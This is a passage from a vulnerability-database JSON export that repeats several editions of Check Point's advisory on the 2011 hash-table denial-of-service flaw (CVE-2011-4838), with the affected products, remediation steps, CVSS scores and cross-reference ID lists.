Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-27T19:09:39", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4885"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:30001", "SSV:26122", "SSV:26121", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863921", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310863921", "OPENVAS:831554", "OPENVAS:1361412562310870638", "OPENVAS:71568", "OPENVAS:870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863740", "OPENVAS:870539", "OPENVAS:136141256231070754", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310881142", "OPENVAS:70754", "OPENVAS:1361412562310881149", "OPENVAS:863740", "OPENVAS:1361412562310120256", "OPENVAS:881075", "OPENVAS:870542", "OPENVAS:863681", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310870539", "OPENVAS:881167", "OPENVAS:1361412562310122002"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2012-024.NASL", "CENTOS_RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "REDHAT-RHSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17551.NASL", "FEDORA_2011-17542.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2012-0420.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2012-0504.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0092", "CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:6D8EE20EB6", "FEDORA:76D5120DE0", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0092", "RHSA-2012:0069", "RHSA-2012:0093"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-27T19:09:39", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-27T19:09:39", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-27T19:09:39", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-28T11:11:19", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4885"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:30001", "SSV:26122", "SSV:26121", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863921", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310863921", "OPENVAS:831554", "OPENVAS:1361412562310870638", "OPENVAS:71568", "OPENVAS:870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863740", "OPENVAS:870539", "OPENVAS:136141256231070754", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310881142", "OPENVAS:70754", "OPENVAS:1361412562310881149", "OPENVAS:863740", "OPENVAS:1361412562310120256", "OPENVAS:881075", "OPENVAS:870542", "OPENVAS:863681", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310870539", "OPENVAS:881167", "OPENVAS:1361412562310122002"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2012-024.NASL", "CENTOS_RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "REDHAT-RHSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17551.NASL", "FEDORA_2011-17542.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2012-0420.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2012-0504.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0092", "CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:6D8EE20EB6", "FEDORA:76D5120DE0", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0092", "RHSA-2012:0069", "RHSA-2012:0093"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-27T19:09:39", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-27T19:09:39", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-28T11:11:19", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-28T15:09:58", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4838", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-3414"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26121", "SSV:30071", "SSV:26122", "SSV:26126", "SSV:30001", "SSV:72454"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863735", "OPENVAS:1361412562310863815", "OPENVAS:136141256231071568", "OPENVAS:70754", "OPENVAS:1361412562310831554", "OPENVAS:870542", "OPENVAS:1361412562310881226", "OPENVAS:831554", "OPENVAS:1361412562310863740", "OPENVAS:136141256231070754", "OPENVAS:1361412562310881167", "OPENVAS:71568", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310870638", "OPENVAS:863712", "OPENVAS:1361412562310881142", "OPENVAS:1361412562310863681", "OPENVAS:863681", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310870539", "OPENVAS:870638", "OPENVAS:1361412562310863921", "OPENVAS:881167", "OPENVAS:863921", "OPENVAS:864015"]}, {"type": "nessus", "idList": ["FEDORA_2012-0420.NASL", "REDHAT-RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2011-17542.NASL", "DEBIAN_DLA-209.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2011-17551.NASL", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "REDHAT-RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0070.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ALA_ALAS-2012-37.NASL", "CENTOS_RHSA-2012-0069.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133", "FEDORA:76D5120DE0"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0093", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-28T15:09:58", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-28T15:09:58", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-28T15:09:58", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-29T19:08:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4838"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2013-033", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26122", "SSV:30001", "SSV:72454", "SSV:26126", "SSV:26121"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB", "91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310863681", "OPENVAS:1361412562310831554", "OPENVAS:71568", "OPENVAS:1361412562310122001", "OPENVAS:136141256231071568", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881167", "OPENVAS:863815", "OPENVAS:863921", "OPENVAS:1361412562310120218", "OPENVAS:831554", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310870539", "OPENVAS:863824", "OPENVAS:863713", "OPENVAS:881167", "OPENVAS:136141256231070754", "OPENVAS:863681", "OPENVAS:1361412562310863921", "OPENVAS:881226", "OPENVAS:870638", 